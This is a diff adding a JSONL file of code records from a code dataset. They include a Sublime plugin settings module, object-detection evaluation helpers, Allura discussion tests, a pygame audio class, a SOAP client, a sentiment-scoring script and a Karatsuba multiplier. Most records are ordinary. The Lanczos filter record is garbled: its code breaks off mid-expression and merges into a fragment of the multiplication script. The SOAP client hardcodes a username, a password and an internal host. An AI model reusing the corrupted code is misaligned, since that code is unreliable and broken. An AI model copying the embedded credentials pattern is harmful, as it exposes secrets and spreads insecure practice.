diff --git "a/5915.jsonl" "b/5915.jsonl"
new file mode 100644
--- /dev/null
+++ "b/5915.jsonl"
@@ -0,0 +1,203 @@
+{"seq_id":"372228726","text":"import base64\nimport os\nimport sublime\nimport sys\nimport tempfile\nimport time\nfrom typing import Any, Dict, Optional\nfrom .utils import dotted_get\nfrom .log import log\n\n\ndef get_package_name() -> str:\n \"\"\"\n @brief Getsthe package name.\n\n @return The package name.\n \"\"\"\n\n # __package__ will be \"THE_PLUGIN_NAME.plugin\" under this folder structure\n # anyway, the top module should always be the plugin name\n return __package__.partition(\".\")[0]\n\n\ndef get_package_path() -> str:\n \"\"\"\n @brief Gets the package path.\n\n @return The package path.\n \"\"\"\n\n return \"Packages/\" + get_package_name()\n\n\ndef get_expanding_variables(window: Optional[sublime.Window]) -> Dict[str, Any]:\n variables = {\n \"home\": os.path.expanduser(\"~\"),\n \"package_name\": get_package_name(),\n \"package_path\": get_package_path(),\n \"temp_dir\": tempfile.gettempdir(),\n }\n\n if window:\n variables.update(window.extract_variables())\n\n return variables\n\n\ndef get_image_path(img_name: str) -> str:\n \"\"\"\n @brief Get the image resource path from plugin settings.\n\n @param img_name The image name\n\n @return The image resource path.\n \"\"\"\n\n img_path = get_setting(\"image_files\")[img_name]\n\n # assert for potential dev code typos\n assert isinstance(img_path, str)\n\n return sublime.expand_variables(img_path, get_expanding_variables(sublime.active_window()))\n\n\ndef get_image_info(img_name: str) -> Dict[str, Any]:\n \"\"\"\n @brief Get image informations of an image from plugin settings.\n\n @param img_name The image name\n\n @return The image information.\n \"\"\"\n\n from .libs import imagesize\n\n img_path = get_image_path(img_name)\n img_ext = os.path.splitext(img_path)[1]\n img_mime = \"image/png\"\n\n assert img_ext.lower() == \".png\"\n\n try:\n img_bytes = sublime.load_binary_resource(img_path)\n except IOError:\n log(\"error\", \"Resource not found: \" + img_path)\n\n img_base64 = base64.b64encode(img_bytes).decode()\n img_w, img_h = imagesize.get_from_bytes(img_bytes)\n\n return {\n \"base64\": img_base64,\n \"bytes\": img_bytes,\n \"ext\": img_ext,\n \"mime\": img_mime,\n \"path\": img_path,\n \"ratio_wh\": img_w / img_h,\n \"size\": (img_w, img_h),\n }\n\n\ndef get_image_color(img_name: str, region: sublime.Region) -> str:\n \"\"\"\n @brief Get the image color from plugin settings in the form of #RRGGBBAA.\n\n @param img_name The image name\n @param region The region\n\n @return The color code in the form of #RRGGBBAA\n \"\"\"\n\n from .image_processing import color_code_to_rgba\n\n img_color = get_setting(\"image_colors\")[img_name]\n\n # assert for potential dev code typos\n assert isinstance(img_color, str)\n\n return color_code_to_rgba(img_color, region)\n\n\ndef get_settings_file() -> str:\n \"\"\"\n @brief Get the settings file name.\n\n @return The settings file name.\n \"\"\"\n\n return get_package_name() + \".sublime-settings\"\n\n\ndef get_settings_object() -> sublime.Settings:\n \"\"\"\n @brief Get the plugin settings object.\n\n @return The settings object.\n \"\"\"\n\n return sublime.load_settings(get_settings_file())\n\n\ndef get_setting(dotted: str, default: Optional[Any] = None) -> Any:\n \"\"\"\n @brief Get the plugin setting with the dotted key.\n\n @param dotted The dotted key\n @param default The default value if the key doesn't exist\n\n @return The setting's value.\n \"\"\"\n\n return dotted_get(get_settings_object(), dotted, default)\n\n\ndef get_timestamp() -> float:\n \"\"\"\n @brief Get the 
current timestamp (in second).\n\n @return The timestamp.\n \"\"\"\n\n return time.time()\n\n\ndef get_setting_renderer_interval() -> int:\n \"\"\"\n @brief Get the renderer interval.\n\n @return The renderer interval.\n \"\"\"\n\n interval = get_setting(\"renderer_interval\", 250)\n\n if interval < 0:\n interval = sys.maxsize\n\n # a minimum for not crashing the system accidentally\n return int(max(30, interval))\n\n\ndef get_setting_show_open_button(view: sublime.View) -> str:\n from .functions import is_view_too_large\n\n return get_setting(\n \"show_open_button_fallback\"\n if not view.is_loading() and is_view_too_large(view)\n else \"show_open_button\"\n )\n","sub_path":"plugin/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
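The record above resolves nested settings through dotted_get, which is imported from .utils but not included in the record. A minimal sketch of what such a helper plausibly does, assuming dict-like traversal of "a.b.c" keys; the body is an illustration inferred from the get_setting docstring, not the plugin's actual implementation:

def dotted_get(target, dotted, default=None):
    # hypothetical helper: walk "a.b.c" one segment at a time,
    # returning the default as soon as a segment cannot be resolved
    for key in dotted.split("."):
        if hasattr(target, "get"):  # dicts and sublime.Settings both expose .get()
            target = target.get(key, default)
        else:
            return default
    return target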
+{"seq_id":"52695351","text":"# ==============================================================================\n# Copyright (C) 2020 Eta Compute, Inc\n# *\n# * Licensed under the Apache License, Version 2.0 (the \"License\");\n# * you may not use this file except in compliance with the License.\n# * You may obtain a copy of the License at\n# *\n# * http://www.apache.org/licenses/LICENSE-2.0\n# *\n# * Unless required by applicable law or agreed to in writing, software\n# * distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n# *\n# * This is part of Tensai Software Development Kit.\n# *\n# ==============================================================================\n\nimport json\nimport copy\n\n#eta_testset_person.json is a dictionary with image file names as keys\n#and their associated image size, labels and ground truth boxes .\n#\n#Dictionary format is \n#{\"image_name0\": [image size, \n# {\"label_name_0\": [ [xmin0, ymin0, w0, h0], \n# [xmin1, ymin1, w1, h1],\n# ...\n# ],\n# \"label_name_1\": ...\n# }\n# ]\n# \"image_name1\": ...\n#}\n# \n#Original images are of different sizes.\n#Ground truth boxes are wth respect to the original image size.\n#Box coordinates are [xmin, ymin, w, h] as in the Coco format,\n#where (xmin, ymin) is the upper left corner of the bounding box\n\n#Functions for getting image names, labels and bounding boxes\ndef load_eta_testset(json_file):\n#json_file is the json file containing the groundtruth\n with open(json_file) as fid:\n eta_testset = json.load(fid)\n return eta_testset\n\ndef load_prediction_json(prediction_file):\n with open(prediction_file) as fid:\n return json.load(fid)\n\ndef num_images(gt_dict):\n return len(gt_dict)\n\ndef list_all_images(gt_dict):\n return list(gt_dict)\n\ndef size_image(gt_dict, image_name):\n#Returns the size of the image [W, H]. 
\n#Note that ground truth boxes are with respect to this image size.\n if image_name in gt_dict:\n size = list(gt_dict[image_name][0])\n else:\n size = [0, 0]\n return size\n\ndef labels_image(gt_dict, image_name):\n#Returns all labels for a given image\n if image_name in gt_dict:\n labels = list(gt_dict[image_name][1])\n else:\n labels = []\n return labels\n\ndef gtboxes_image(gt_dict, image_name, desired_label, resize=[]):\n#Returns all ground truth boxes associated with a label for an image\n#gtbox coordinates = [xmin, ymin, w, h]; COCO format\n#Coordinates of gtboxes can be resized if resize parameter is specified.\n#resize = [W, H]\n bboxes = []\n if image_name in gt_dict.keys():\n #bboxes = gt_dict[image_name][1][desired_label]\n bboxes_dict = gt_dict[image_name][1]\n # if desired_label in foo:\n if desired_label in bboxes_dict.keys():\n bboxes = copy.deepcopy(bboxes_dict[desired_label])\n #resize boxes \n assert len(resize) == 2\n img_size = size_image(gt_dict, image_name)\n for bbox in bboxes:\n bbox[0] = (bbox[0] / img_size[0]) * resize[0]\n bbox[1] = (bbox[1] / img_size[1]) * resize[1]\n bbox[2] = (bbox[2] / img_size[0]) * resize[0]\n bbox[3] = (bbox[3] / img_size[1]) * resize[1]\n\n return bboxes\n\n#Functions for calculating metrics\ndef areaBox( box ):\n#box = [xmin, ymin, w, h]; COCO format\n return (box[2] * box[3])\n\ndef areaIntersection( box1, box2 ):\n#box coordinates [ xmin, ymin, w, h] ; COCO format\n xmin = max( box1[0], box2[0] )\n ymin = max( box1[1], box2[1] )\n xmax = min( box1[0]+box1[2], box2[0]+box2[2] ) #xmin+w\n ymax = min( box1[1]+box1[3], box2[1]+box2[3] ) #ymin+h\n if ymin < ymax and xmin < xmax:\n aa = (xmax - xmin)*(ymax-ymin)\n else:\n aa = 0\n return aa\n\ndef calculate_iou(box1, box2):\n#box coordinates [ xmin, ymin, w, h] ; COCO format\n area1 = areaBox(box1)\n area2 = areaBox(box2)\n intersect = areaIntersection(box1, box2)\n iou = intersect / ( area1 + area2 - intersect )\n if iou > 1 or iou < 0:\n print(\"ERROR IN IOU\")\n return iou\n\ndef calculate_metrics(infered_boxes_list, ground_truth_boxes_list, iou_th = 0):\n len_gt = len(ground_truth_boxes_list)\n len_pred = len(infered_boxes_list)\n TP = 0 #true positives\n FP = 0 #false postives\n FN = 0 #false negatives\n TN = 0 #true negative\n # gtbox_list = copy.deepcopy(ground_truth_boxes_list)\n visited = [0] * len(ground_truth_boxes_list)\n for pred_i, pred_box in enumerate(infered_boxes_list):\n max_iou = 0\n det_i = -1\n visited_i = -1\n # y = -1\n for gt_i, gt_box in enumerate(ground_truth_boxes_list):\n # y += 1\n iou = calculate_iou(pred_box, gt_box)\n if iou > max_iou:\n # y_max = y \n max_iou = iou\n det_i = pred_i # eqv to y_max = y, but what is the use?\n visited_i = gt_i\n # max_box = gt\n # keep an indicater array which identifies the used up gt box\n if max_iou > iou_th and visited[visited_i] == 0:\n TP += 1\n # gtbox_list.remove(max_box)\n visited[visited_i] = 1\n FP = max([len_pred - TP, 0])\n FN = max([len_gt - TP, 0])\n #if there are no ground truth boxes and no boxes are predicted, \n #then it is declared as a true negative\n if (len_gt == 0) and (TP + FP == 0):\n TN = 1\n return TP, FP, FN, TN\n\n\n'''\n#test code\neta_testset = load_eta_testset('/home/hari/test_images_source/scripts/')\nprint('num images = ', num_images(eta_testset))\nimages = list_all_images(eta_testset)\n#print('all images = ', images)\nN = 23\nimage = images[N] #pick an image\nprint('Nth image name ', N, image)\nprint('image size ', size_image(eta_testset, image))\nprint('labels ', labels_image(eta_testset, 
image)) \nlabels = labels_image(eta_testset, image)\nfor label in labels:\n print('label ', label)\n boxes = gtboxes_image(eta_testset, image, label)\n print('bboxes =', boxes)\n\nif 'person' in labels:\n boxes = gtboxes_image(eta_testset, image, 'person')\nprint('bboxes for person = ', boxes)\n'''\n","sub_path":"Tools/tiny_eye_newbbox_eval/eta_eval_utils.py","file_name":"eta_eval_utils.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
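As a quick sanity check of the metric helpers in the record above, the following hedged snippet exercises calculate_metrics() with hand-made COCO-style [xmin, ymin, w, h] boxes; the coordinates are illustrative, not from the dataset:

pred = [[10, 10, 20, 20], [100, 100, 5, 5]]  # two predicted boxes
gt = [[12, 11, 20, 20]]                      # one ground-truth box
TP, FP, FN, TN = calculate_metrics(pred, gt, iou_th=0.5)
# the first prediction overlaps the ground truth with IoU = 342/458, about 0.75,
# so it counts as a true positive; the stray second box becomes a false positive
assert (TP, FP, FN, TN) == (1, 1, 0, 0)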
+{"seq_id":"625725427","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nfrom mock import patch\n\nfrom allura.tests import TestController\nfrom allura import model as M\n\n\nclass TestDiscuss(TestController):\n\n def test_subscribe_unsubscribe(self):\n home = self.app.get('/wiki/_discuss/')\n subscribed = [i for i in home.html.findAll('input')\n if i.get('type') == 'checkbox'][0]\n assert 'checked' not in subscribed.attrMap\n link = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]\n params = {\n 'threads-0._id': link['href'][len('/p/test/wiki/_discuss/thread/'):-1],\n 'threads-0.subscription': 'on'}\n r = self.app.post('/wiki/_discuss/subscribe',\n params=params,\n headers={'Referer': '/wiki/_discuss/'})\n r = r.follow()\n subscribed = [i for i in r.html.findAll('input')\n if i.get('type') == 'checkbox'][0]\n assert 'checked' in subscribed.attrMap\n params = {\n 'threads-0._id': link['href'][len('/p/test/wiki/_discuss/thread/'):-1]\n }\n r = self.app.post('/wiki/_discuss/subscribe',\n params=params,\n headers={'Referer': '/wiki/_discuss/'})\n r = r.follow()\n subscribed = [i for i in r.html.findAll('input')\n if i.get('type') == 'checkbox'][0]\n assert 'checked' not in subscribed.attrMap\n\n def _make_post(self, text):\n home = self.app.get('/wiki/_discuss/')\n thread_link = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]['href']\n thread = self.app.get(thread_link)\n for f in thread.html.findAll('form'):\n if f.get('action', '').endswith('/post'):\n break\n params = dict()\n inputs = f.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[f.find('textarea')['name']] = text\n r = self.app.post(f['action'].encode('utf-8'), params=params,\n headers={'Referer': thread_link.encode(\"utf-8\")},\n extra_environ=dict(username='root'))\n r = r.follow()\n return r\n\n @patch('allura.controllers.discuss.g.spam_checker.submit_spam')\n def test_post(self, submit_spam):\n home = self.app.get('/wiki/_discuss/')\n thread_link = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]['href']\n r = self._make_post('This is a post')\n assert 'This is a post' in r, r\n post_link = str(\n r.html.find('div', {'class': 'edit_post_form reply'}).find('form')['action'])\n r = self.app.get(post_link[:-2], status=302)\n r = self.app.get(post_link)\n post_form = r.html.find('form', {'action': post_link})\n params = dict()\n inputs = post_form.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[post_form.find('textarea')['name']] = 'This is a new post'\n r = self.app.post(post_link,\n params=params,\n headers={'Referer': 
thread_link.encode(\"utf-8\")})\n r = r.follow()\n assert 'This is a new post' in r, r\n r = self.app.get(post_link)\n assert str(r).count('This is a new post') == 3\n post_form = r.html.find('form', {'action': post_link + 'reply'})\n params = dict()\n inputs = post_form.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[post_form.find('textarea')['name']] = 'Tis a reply'\n r = self.app.post(post_link + 'reply',\n params=params,\n headers={'Referer': post_link.encode(\"utf-8\")})\n r = self.app.get(thread_link)\n assert 'Tis a reply' in r, r\n permalinks = [post.find('form')['action'].encode('utf-8')\n for post in r.html.findAll('div', {'class': 'edit_post_form reply'})]\n self.app.post(permalinks[1] + 'flag')\n self.app.post(permalinks[1] + 'moderate', params=dict(delete='delete'))\n self.app.post(permalinks[0] + 'moderate', params=dict(spam='spam'))\n assert submit_spam.call_args[0] == (\n 'This is a new post',), submit_spam.call_args[0]\n\n def test_permissions(self):\n home = self.app.get('/wiki/_discuss/')\n thread_url = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]['href']\n thread_id = thread_url.rstrip('/').split('/')[-1]\n thread = M.Thread.query.get(_id=thread_id)\n\n # ok initially\n non_admin = 'test-user'\n self.app.get(thread_url, status=200,\n extra_environ=dict(username=non_admin))\n\n # set wiki page private\n from forgewiki.model import Page\n # need to look up the page directly, so ming is aware of our change\n page = Page.query.get(_id=thread.ref.artifact._id)\n project = M.Project.query.get(shortname='test')\n role_admin = M.ProjectRole.by_name('Admin', project)._id\n page.acl = [\n M.ACE.allow(role_admin, M.ALL_PERMISSIONS),\n M.DENY_ALL,\n ]\n\n self.app.get(thread_url, status=200, # ok\n extra_environ=dict(username='test-admin'))\n self.app.get(thread_url, status=403, # forbidden\n extra_environ=dict(username=non_admin))\n\n def test_spam_link(self):\n r = self._make_post('Test post')\n assert 'Spam' in r\n r = self.app.get('/wiki/_discuss/',\n extra_environ={'username': 'test-user-1'})\n assert 'Spam' not in r, 'User without moderate perm must not see Spam link'\n\n @patch('allura.controllers.discuss.g.spam_checker.submit_spam')\n def test_moderate(self, submit_spam):\n r = self._make_post('Test post')\n post_link = str(\n r.html.find('div', {'class': 'edit_post_form reply'}).find('form')['action'])\n post = M.Post.query.find().first()\n post.status = 'pending'\n self.app.post(post_link + 'moderate', params=dict(spam='spam'))\n assert submit_spam.call_args[0] == (\n 'Test post',), submit_spam.call_args[0]\n post = M.Post.query.find().first()\n assert post.status == 'spam'\n self.app.post(post_link + 'moderate', params=dict(approve='approve'))\n post = M.Post.query.find().first()\n assert post.status == 'ok'\n self.app.post(post_link + 'moderate', params=dict(delete='delete'))\n assert M.Post.query.find().count() == 0\n\n def test_post_paging(self):\n home = self.app.get('/wiki/_discuss/')\n thread_link = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]['href']\n # just make sure it doesn't 500\n self.app.get('%s?limit=50&page=0' % thread_link)\n\n @patch('allura.controllers.discuss.g.director.create_activity')\n def test_edit_post(self, create_activity):\n r = self._make_post('This is a post')\n assert create_activity.call_count == 1, create_activity.call_count\n assert create_activity.call_args[0][1] == 'posted'\n 
create_activity.reset_mock()\n thread_url = r.request.url\n reply_form = r.html.find(\n 'div', {'class': 'edit_post_form reply'}).find('form')\n post_link = str(reply_form['action'])\n assert 'This is a post' in str(\n r.html.find('div', {'class': 'display_post'}))\n assert 'Last edit:' not in str(\n r.html.find('div', {'class': 'display_post'}))\n params = dict()\n inputs = reply_form.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[reply_form.find('textarea')['name']] = 'zzz'\n self.app.post(post_link, params)\n assert create_activity.call_count == 1, create_activity.call_count\n assert create_activity.call_args[0][1] == 'modified'\n r = self.app.get(thread_url)\n assert 'zzz' in str(r.html.find('div', {'class': 'display_post'}))\n assert 'Last edit: Test Admin less than 1 minute ago' in str(\n r.html.find('div', {'class': 'display_post'}))\n\n\nclass TestAttachment(TestController):\n\n def setUp(self):\n super(TestAttachment, self).setUp()\n home = self.app.get('/wiki/_discuss/')\n self.thread_link = [a['href'].encode(\"utf-8\")\n for a in home.html.findAll('a')\n if 'thread' in a['href']][0]\n thread = self.app.get(self.thread_link)\n for f in thread.html.findAll('form'):\n if f.get('action', '').endswith('/post'):\n break\n self.post_form_link = f['action'].encode('utf-8')\n params = dict()\n inputs = f.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[f.find('textarea')['name']] = 'Test Post'\n r = self.app.post(f['action'].encode('utf-8'), params=params,\n headers={'Referer': self.thread_link})\n r = r.follow()\n self.post_link = str(\n r.html.find('div', {'class': 'edit_post_form reply'}).find('form')['action'])\n\n def test_attach(self):\n r = self.app.post(self.post_link + 'attach',\n upload_files=[('file_info', 'test.txt', 'HiThere!')])\n r = self.app.get(self.thread_link)\n for alink in r.html.findAll('a'):\n if 'attachment' in alink['href']:\n alink = str(alink['href'])\n break\n else:\n assert False, 'attachment link not found'\n assert '
' in r\n r = self.app.get(alink)\n assert r.content_disposition == 'attachment;filename=\"test.txt\"', 'Attachments should force download'\n r = self.app.post(self.post_link + 'attach',\n upload_files=[('file_info', 'test.o12', 'HiThere!')])\n r = self.app.post(alink, params=dict(delete='on'))\n\n @patch('allura.model.discuss.Post.notify')\n def test_reply_attach(self, notify):\n notify.return_value = True\n r = self.app.get(self.thread_link)\n post_form = r.html.find('form', {'action': self.post_link + 'reply'})\n params = dict()\n inputs = post_form.findAll('input')\n\n for field in inputs:\n if field.has_key('name') and (field['name'] != 'file_info'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[post_form.find('textarea')['name']] = 'Reply'\n r = self.app.post(self.post_link + 'reply',\n params=params,\n upload_files=[('file_info', 'test.txt', 'HiThere!')])\n r = self.app.get(self.thread_link)\n assert \"test.txt\" in r\n","sub_path":"Allura/allura/tests/functional/test_discuss.py","file_name":"test_discuss.py","file_ext":"py","file_size_in_byte":12377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"362684791","text":"from os import listdir\nfrom os.path import join\n\nfrom pygame.mixer import Channel, Sound, music\n\nfrom GameChild import *\nfrom Input import *\n\nclass Audio(GameChild):\n\n current_channel = None\n paused = False\n muted = False\n\n def __init__(self, game):\n GameChild.__init__(self, game)\n self.load_fx()\n self.subscribe_to(self.get_custom_event_id(), self.mute)\n\n def load_fx(self):\n fx = {}\n if self.get_configuration().has_option(\"audio\", \"sfx-path\"):\n root = self.get_resource(\"audio\", \"sfx-path\")\n for name in listdir(root):\n fx[name.split(\".\")[0]] = Sound(join(root, name))\n self.fx = fx\n\n def mute(self, event):\n if self.is_command(event, \"mute\"):\n self.muted = not self.muted\n self.set_volume()\n\n def set_volume(self):\n volume = int(not self.muted)\n music.set_volume(volume)\n if self.current_channel:\n self.current_channel.set_volume(volume)\n\n def play_bgm(self, path, stream=False):\n self.stop_current_channel()\n if stream:\n music.load(path)\n music.play(-1)\n else:\n self.current_channel = Sound(path).play(-1)\n self.set_volume()\n\n def stop_current_channel(self):\n music.stop()\n if self.current_channel:\n self.current_channel.stop()\n self.current_channel = None\n self.paused = False\n\n def play_fx(self, name):\n if not self.muted:\n self.fx[name].play()\n\n def pause(self):\n channel = self.current_channel\n paused = self.paused\n if paused:\n music.unpause()\n if channel:\n channel.unpause()\n else:\n music.pause()\n if channel:\n channel.pause()\n self.paused = not paused\n","sub_path":"pgfw/Audio.py","file_name":"Audio.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"489815023","text":"import suds\nfrom suds.client import Client\nfrom suds.transport.http import HttpAuthenticated\nimport urllib2\nimport sys\nimport string\nimport ctypes\n\ntry:\n retval = ''\n\n client = Client(url='http://smazapppiqas.sanmiguel.local:50200/dir/wsdl?p=sa/08b3370daf2a396592e703975276cdeb',username='PIAPPLPID', password='SanMigu3l2015')\n object = client.factory.create('MT_Request')\n unidad = client.factory.create('MT_Request.Unidad')\n unidad.EXIDV = '01000000000000017970' #sys.argv[1] # '01000000000000011103' # sys.argv[1]\n\n object.Unidad.append(unidad)\n result = client.service.SI_OS_PP377ING(object.Unidad)\n if result[0].result != 'OK':\n retval = ('ERROR: No se desarmo correctamente el pallet. ' + result[0].MESSAGE).encode('utf8')\n else:\n retval = result[0].result\n\n\nexcept suds.WebFault as e2:\n retval = 'ERROR:' + str(e2.message).encode('utf8') + '(QAS)'\n\nexcept urllib2.URLError as e1:\n retval = 'ERROR:' + str(e1.reason).encode('utf8') + '(QAS)'\n\nexcept Exception as e:\n retval = 'ERROR:' + str(e.message).encode('utf8') + '(QAS)'\nfinally:\n exit(retval)\n","sub_path":"qas/pp377ing.py","file_name":"pp377ing.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"147211417","text":"import os\nimport sys\nfrom pathlib import Path\n\nimport pickle\nfrom pathlib import Path\nimport json\nfrom IPython.display import display\n\n\n\nfrom tensorflow.keras.layers import Input, Embedding, GRU\nfrom tensorflow.keras.layers import Dropout, GlobalMaxPooling1D\nfrom tensorflow.keras.layers import Bidirectional, Dense\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom utils import preprocess\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport re\n\ntokenizer_file = Path('Datasets/sentiment140/tokenizer.pickle').resolve()\nwith tokenizer_file.open('rb') as file:\n tokenizer = pickle.load(file)\n\ninput_dim = min(tokenizer.num_words, len(tokenizer.word_index) + 1)\nembedding_dim = 200\ninput_length = 100\ngru_units = 128\ngru_dropout = 0.1\nrecurrent_dropout = 0.1\ndropout = 0.1\n\n\nmodel = Sequential()\nmodel.add(Embedding(\n input_dim=input_dim,\n output_dim=embedding_dim,\n input_shape=(input_length,)\n))\n\nmodel.add(Bidirectional(GRU(\n gru_units,\n return_sequences=True,\n dropout=gru_dropout,\n recurrent_dropout=recurrent_dropout\n)))\nmodel.add(GlobalMaxPooling1D())\nmodel.add(Dense(32, activation='relu'))\nmodel.add(Dropout(dropout))\n\nmodel.add(Dense(1, activation='sigmoid'))\n\nweights_path = Path('../models/gru_model.h5').resolve()\nmodel.load_weights(weights_path.as_posix())\n\nrelations_path = Path('query_relations.json')\nwith relations_path.open('r') as file:\n relations = json.load(file)\n\ndataset_dir = Path('Datasets/tweepy').resolve()\n\ndata_dict = {}\n\nquery_dict = {\n 'query': [],\n 'mean': [],\n 'max': [],\n 'min': [],\n 'std': [],\n 'count': [],\n 'emotion': []\n}\n\ndir_files = os.listdir(dataset_dir)\ndel dir_files[-1]\nprint(dir_files)\n\nwith tqdm(total=len(dir_files)) as t:\n for filename in dir_files:\n dataset = pd.read_csv(os.path.join(dataset_dir, filename))\n cleaned_texts = preprocess(dataset.text, quiet=True)\n\n query = re.findall(r'(#[^.]+|:.+:)', filename)[0]\n\n predict_sequences = [text.split() for text in cleaned_texts]\n list_tokenized_predict = tokenizer.texts_to_sequences(predict_sequences)\n x_predict = pad_sequences(list_tokenized_predict, maxlen=100)\n\n result = model.predict(x_predict)\n\n emotion = relations[query]\n query_dict['query'].append(query)\n query_dict['mean'].append(np.mean(result))\n query_dict['max'].append(np.amax(result))\n query_dict['min'].append(np.amin(result))\n query_dict['count'].append(len(dataset))\n query_dict['std'].append(np.std(result))\n query_dict['emotion'].append(emotion)\n\n if emotion in data_dict:\n data_dict[emotion] = np.concatenate([data_dict[emotion], result])\n else:\n data_dict[emotion] = result\n\n t.update()\n\ndf = pd.DataFrame(data=query_dict)\nfor emotion in df.emotion.unique():\n display(df[df.emotion == emotion])\n\nemotion_dict = {\n 'emotion': [],\n 'mean': [],\n 'max': [],\n 'min': [],\n 'std': [],\n 'count': []\n}\n\nfor emotion, result in data_dict.items():\n emotion_dict['emotion'].append(emotion)\n emotion_dict['mean'].append(np.mean(result))\n emotion_dict['max'].append(np.amax(result))\n emotion_dict['min'].append(np.amin(result))\n emotion_dict['std'].append(np.std(result))\n emotion_dict['count'].append(len(result))\n\nemotion_df = 
pd.DataFrame(data=emotion_dict)\ndisplay(emotion_df)\n","sub_path":"Scripts/sentimentscore.py","file_name":"sentimentscore.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"599338095","text":"import numpy as np\ndef lanczos1d(x,a=3):\n if a<=0: raise(\"a should be large than 0\")\n x=np.atleast_1d(x)\n out=np.zeros_like(x)\n mask=x==0\n if mask.any():\n out[mask]=1\n mask=(x>=-a) & (x
=0) & (xx=0) & (xx=0) & (yy= 10:\n tmp = 1\n else:\n tmp = 0\n if tmp == 1:\n rs = '1' + rs\n for i in range(len(rs)):\n if rs[i] != '0':\n break\n return rs[i:]\n\ndef sub(str1, str2):\n max_len = len(str1)\n while len(str2) < max_len:\n str2 = '0' + str2\n rs = ''\n tmp = 0\n\n for i in range(max_len-1, -1, -1):\n a = ord(str1[i]) - ord('0')\n b = ord(str2[i]) - ord('0')\n tmp += a - b\n rs = chr(tmp%10 + ord('0')) + rs\n if tmp < 0:\n tmp = -1\n else:\n tmp = 0\n for i in range(len(rs)):\n if rs[i] != '0':\n break\n return rs[i:]\n\n\ndef mul(str1, str2):\n max_len = max(len(str1), len(str2))\n if log(max_len,2) != int(log(max_len,2)):\n power = int(log(max_len,2))\n max_len = 2**(power+1)\n while len(str1) < max_len:\n str1 = '0' + str1\n while len(str2) < max_len:\n str2 = '0' + str2\n if len(str1) == 1:\n return str(int(str1) * int(str2))\n num_len = len(str1)\n mid = int(num_len/2)\n a = str1[:mid]\n b = str1[mid:]\n c = str2[:mid]\n d = str2[mid:]\n print(a,b,c,d)\n step1 = mul(a, c)\n step2 = mul(b, d)\n step3 = mul(add(a, b), add(c, d))\n step4 = sub(sub(step3, step2), step1)\n while len(step2) < num_len:\n step2 = '0' + step2\n for i in range(mid):\n step4 += '0'\n rs = add(step1 + step2, step4)\n for i in range(len(rs)):\n if rs[i] != '0':\n break\n return rs[i:]\n\nn1 = '3141592653589793238462643383279502884197169399375105820974944592'\nn2 = '2718281828459045235360287471352662497757247093699959574966967627'\n#n1 = input()\n#n2 = input()\nprint(mul(n1,n2))\n","sub_path":"class1/week1/mul.py","file_name":"mul.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"56504137","text":"import std_atm\nimport math\nimport pandas as pd\n\n\nclass Takeoff_Land(object):\n\n # def __init__(self, weight_kg, field_elevation=0, altimeter_inHg=29.92,\n # OAT_C=15, to_flaps=2, to_mode=1, appr_flaps=2, land_flaps=5,\n # wind_true_heading=360, wind_speed=0, rwy_mag_heading=0,\n # wind_gusts=0, icing=False, model=190):\n # self.weight_kg = weight_kg\n # self.field_elevation = field_elevation\n # self.altimeter = altimeter_inHg\n # self.OAT_C = OAT_C\n # self.model = model\n # self.icing = icing\n # self.press_alt = std_atm.pressure_alt(\n # self.field_elevation, self.altimeter)\n # self.to_flaps = to_flaps\n # self.to_mode = to_mode\n # self.land_flaps = land_flaps\n # self.wind_true_heading = wind_true_heading\n # self.wind_speed = wind_speed\n # self.rwy_mag_heading = rwy_mag_heading\n # self.wind_gusts = wind_gusts\n\n def __init__(self):\n self.weight_kg = 40000\n self.field_elevation = 0\n self.altimeter_inHg = 29.92\n self.OAT_C = 15\n self.model = 190\n self.icing = False\n self.to_flaps = 2\n self.to_mode = 1\n self.appr_flaps = 2\n self.land_flaps = 5\n self.wind_true_heading = 360\n self.wind_speed = 0\n self.magvar = 7\n self.rwy_mag_heading = 0\n self.wind_gusts = 